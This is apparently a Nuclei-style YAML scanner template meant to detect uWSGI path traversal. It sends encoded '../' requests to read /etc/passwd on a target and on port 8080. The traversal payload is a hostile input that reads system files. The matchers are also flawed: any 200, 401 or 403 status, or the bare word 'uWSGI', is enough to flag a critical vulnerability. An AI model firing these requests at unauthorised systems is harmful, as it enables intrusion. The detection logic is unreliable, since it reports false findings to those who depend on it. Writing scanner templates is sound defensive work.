id: uwsgi-misconfig
info:
  name: uWSGI Misconfiguration Detection
  author: pwn
  severity: critical
  description: Detects exposed uWSGI instances vulnerable to path traversal, potentially leading to system file exposure.
  tags: uwsgi, misconfiguration, path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2fetc/passwd"
      - "{{BaseURL}}:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd"
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "passwd"
          - "uWSGI"
        part: body
        condition: or
        case-insensitive: true
      - type: word
        words:
          - "uWSGI"
        part: body
        condition: or
        case-insensitive: true
      - type: status
        status:
          - 403
          - 401
    extractors:
      - type: regex
        name: matched_path
        part: request
        regex:
          - "https?://[^/]+(/.*)"
        group: 1
